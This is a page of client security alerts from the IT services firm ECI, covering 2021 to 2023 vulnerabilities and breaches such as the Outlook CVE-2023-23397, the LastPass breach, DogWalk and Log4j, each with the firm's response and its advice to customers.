IN ADDITION TO THE ALERTS BELOW, ECI UTILIZES A MASS NOTIFICATION PLATFORM TO COMMUNICATE WITH CLIENTS REGULARLY.
ECI Client Alerts
MARCH 2023: CRITICAL OUTLOOK VULNERABILITY (CVE-2023-23397) SOURCE: ECI
ECI has been made aware of a critical escalation of privilege vulnerability in Microsoft Outlook, CVE-2023-23397. The vulnerability allows an attacker to obtain the NTLM password hash of the target user by sending them a specially crafted email containing a UNC path to a SMB server controlled by the attacker.
- For customers using ECI Managed SIEM services, we already have detection rules in place to alert us on successful outbound SMB traffic to the internet. The SOC team will investigate such incidents on a case-by-case basis.
- For customer using ECI-managed Palo Alto Firewalls, we have policies in place to block such traffic to the internet.
- For all other customers, we are investigating different approaches to block outbound SMB traffic using alternative methods without causing service disruptions.
Technical details can be found at the link(s) below:
CVE-2023-23397 - Security Update Guide - Microsoft - Microsoft Outlook Elevation of Privilege Vulnerability
Critical Microsoft Outlook bug PoC shows how easy it is to exploit (bleepingcomputer.com)
FEBRUARY 2023: MULTIPLE MICROSOFT AND CITRIX VULNERABILITIES SOURCE: ECI
ECI has been made aware of multiple security vulnerabilities in Microsoft and Citrix software products outlined below.
- CVE-2023-24483: Improper privilege management flaw leading to privilege escalation to NT AUTHORITY\SYSTEM. Impacts Citrix Virtual Apps and Desktops before 2212, 2203 LTSR before CU2, and 1912 LTSR before CU6.
- CVE-2023-24484: Improper access control flaw allowing log files to be written to a directory that should be out of reach for regular users. Impacts Citrix Workspace App for Windows before 2212, 2203 LTSR before CU2, and 1912 LTSR before CU6.
- CVE-2023-24485: Improper access control flaw leading to privilege escalation. Impacts Citrix Workspace App for Windows before 2212, 2203 LTSR before CU2, and 1912 LTSR before CU6.
- CVE-2023-24486: Improper access control flaw leading to session takeover. Impacts Citrix Workspace App for Linux before 2302.
- CVE-2023-21823 - Windows Graphics Component Remote Code Execution Vulnerability allowing attackers to execute commands with SYSTEM privileges.
- CVE-2023-21715 - Microsoft Publisher Security Features Bypass Vulnerability allowing a specially crafted document to bypass Office macro policies that block untrusted or malicious files. Exploiting this flaw would effectively allow macros in a malicious Publisher document to run without first warning the user.
- CVE-2023-23376 - Windows Common Log File System Driver Elevation of Privilege Vulnerability allowing attackers to gain SYSTEM privileges upon exploitation.
We are actively monitoring the situation and reviewing uses of related software internally and at our customers. We are planning to apply updates and patches using our remote management and monitoring (RMM) toolset, or manually where necessary. You will be informed if any of the necessary changes impact your services.
Note that ECI employs a defence-in-depth approach to your security which provides layered protection across multiple attack vectors. Please stand by for further updates as we perform our investigation.
JANUARY 2023: MS DEFENDER DELETING SHORTCUTS SOURCE: ECI
We have been noticing issues across a number of customers caused by a bug in the most recent definition update for Microsoft Defender for Endpoint. Based on the preliminary reports we have collected, the bug is causing application shortcuts for Microsoft Office and a number of other applications to be removed from desktop and start menu.
Microsoft has reverted the culprit Attack Surface Reductio (ASR) rule and we are remediating the problem for affected customers on a case-by-case basis until the vendor releases a working solution to restore the missing/malfunctioning shortcuts.
We will continue to monitor the situation and provide you with updates as they become available.
You can find more information about this incident here.
DECEMBER 2022: LASTPASS BREACH SOURCE: ECI
On December 22, 2022, LastPass notified their customers that an unauthorized party has gained access to their environment and stolen customers encrypted password vaults and unencrypted metadata such as website addresses. Below is the list of our recommendations based on the preliminary information currently available on this breach.
- We recommend all LastPass users to reset their master passwords immediately. The master password should not be used anywhere else.
- Despite the vendor’s assurances about the safely of the stolen vaults, we recommend that users err on the side of caution reset all passwords stored in LastPass, with higher priority given to critical accounts such as banking, e-mail, and social media. This is especially important for users who have used short or easy-to-remember master passwords for their vaults.
- Users who have been using MFA using software or hardware tokens are also recommended to follow the steps above. While using MFA greatly reduces the risk of breaches against online accounts, it does not protect you against offline attacks on password vaults.
- We are expecting to see an increase in the number of phishing attacks where the scammers attempt to take advantage of this incident and lure users to click on links in order to “update their passwords”.
- We recommend adding your accounts to a Dark Web monitoring service so you get notified if any of your credentials are leaked to the dark web. You can add your accounts on a free service such as haveibeenpwned.com, or leverage ECI Dark Web Monitoring service for better visibility into the content on the Dark Web for both corporate and personal accounts beyond just usernames and passwords.
- To further secure your LasttPass vault, consider increasing the number of iterations for your master password from the default 100,100 rounds to 310,000 rounds recommended by OWASP.
AUGUST 2022: ECI CYBERSECURITY ADVISORY - CVE-2022-30190 (DOGWALK) SOURCE: ECI
Microsoft has released a patch for a critical remote code execution vulnerability, CVE-2022-34713, a new variant of the DogWalk vulnerability that was detected and patched in May, 2022.
The vulnerability allows an attacker to run arbitrary commands on the target device by convincing the user to open a malicious file sent via e-mail or hosted on a website. The vulnerability does not require authentication on the victim's machine and is currently being actively exploited in the wild.
What has been done:
Execution Prevention – ECI Managed Cloud Services or ECI Managed Endpoint Protection
We have confirmed that all known variants of this attack can be detected and blocked by SentinelOne agents.
Detection – ECI Managed SIEM or ECI Cyber Bundle
Detection rules have been added to Eze Managed SIEM and the SOC will monitor for any suspicious activity
Patching – ECI Managed Cloud Services, ECI Patch Management, or ECI Cyber Bundle
The required software patches will be applied to all Windows workstation devices throughout this week, and on all Windows servers over the weekend (August 20-21).
Customers who do not use any of the services above are highly recommended to manually update all Windows devices as soon as possible and implement the necessary detection rules on their EDR and SIEM platforms.
Customers also have the option to contact their account team and request to opt-out of this weekend’s emergency patch, deferring it to their regular patching schedule.
Please contact our global support desk or reach out to your Customer Success Manager by phone or email for any further questions. We will continue to provide you with more updates on this advisory.
FEBRUARY 2022: ECI RESPONSE TO THE CURRENT CYBERSECURITY THREATS SOURCE: ECI
With the escalation of conflict in the Ukraine, we want to give an update on what we are doing to protect businesses (yours and ours) from cybersecurity threats. We continue to monitor the threat landscape as we always do. Although we conduct scheduled risk assessments as part of our cyber program, we have initiated a Ukraine specific assessment using guidance provided by the U.S. Cybersecurity & Infrastructure Security Agency (CISA) [cisa.gov].
Currently, most of the Russian attacks have been directed at the Ukraine. Specifically, the Ukraine has been hit with a data-wiper malware, making secure backups as important as ever. An important aspect of the Russia threat is that operations could be indirectly impacted by attacks on other organizations. Russia is known to launch attacks against banks and broad-based infrastructure like electricity, water, and transportation.
Sentinel One, ECI’s EDR Partner, is continually monitoring threat intelligence for known and emerging malware due to the current situation. Our clients are protected against the “Hermetic Wiper” malware threat widely circulating in the Ukraine. ECI currently has over 12,000 protected endpoints under management.
With over 600 detection rules in place, our Security Information and Event Monitoring platform is continually monitoring for IOCs (Indicators of Compromise) specific to this event and for other threats using the globally accepted MITRE Attack framework.
ECI recommends applying updates to any known vulnerabilities so that patches are applied to reduce exposure.
Keep an out for any suspicious traffic that may be coming from outside the country to your organization
Keep an eye out for any suspicious emails and phishing activity within your organization
As always, ECI will be closely monitoring the situation and sharing information pertaining to any potential threats that it might pose. If you have any questions, please contact your ECI representative.
DECEMBER 2021: LOG4J ZERO-DAY VULNERABILITY SOURCE: ECI
A critical vulnerability has been discovered in Apache Log4j 2, an open-source Java package used to enable logging in many popular applications, and it can be exploited to enable remote code execution on countless servers.
For more information concerning Log4j Zero-Day Vulnerability, please see details published here: https://www.pcmag.com/news/countless-serves-are-vulnerable-to-apache-log4j-zero-day-exploit
SEPTEMBER 2021: APPLE’S EMERGENCY PATCH FOR 'FORCEDENTRY' (IMESSAGE FLAW, CVE-2021-30860) SOURCE: ECI
On September 13, 2021, it was announced that A zero-click, zero-day exploit named ‘ForceEntry” has been discovered in Apple products (iPhone, iPad, Mac, and Apple Watch) which takes advantage of a flaw in iMessage that allow the push of the Pegasus spyware to devices. This allows for access to the target device, including personal data, photos, messages and location.
Apple has released emergency patches to address the zero-day flaw. ECI recommends immediately updating your Apple products to address this vulnerability.
JULY 2021: KASEYA VSA POTENTIAL ATTACK SOURCE: ECI
Please be advised that we have been made aware of a potential attack against Kaseya (IT management software provider used by several MSPs), specifically affecting their on premise VSA solution.
You can get the latest updates from Kaseya following the link: https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689
JANUARY 28, 2021: APPLE IOS ALERT SOURCE: ECI
Please note that Apple has released a new iOS 14.4 update which in addition to the features listed here also includes fixes for a number of known vulnerabilities. The security content of iOS 14.4 is described in this document here. One of the known vulnerabilities is a "WebKit" bug which is known to be actively exploited. This bug allows a remote attacker to cause arbitrary code execution.
Following this latest Apple release ECI recommends that you update your corporate and personal Apple iOS devices to iOS 14.4 version as soon as possible.
JANUARY 13, 2021: MIMECAST SECURITY ALERT SOURCE: ECI
Eze Castle Integration has been made aware of a breach in the Mimecast platform as part of the SolarWinds fallout. We are actively monitoring the situation and will notify our customers of any known impact to their e-mail. At this time we know that ~10% of Mimecast customers were impacted and Mimecast has already reached out to them directly. We are in the process of evaluating to determine if and which of our clients use certificate-based e-mail for Microsoft365.
Customers that leverage Proofpoint do not appear to be affected by this breach.
Note that Eze Castle Integration employs a defence-in-depth approach to your security which provides layered protection across multiple attack vectors. Please stand by for further updates as we perform our investigation.
For additional information on the breach please see Mimecast’s response here.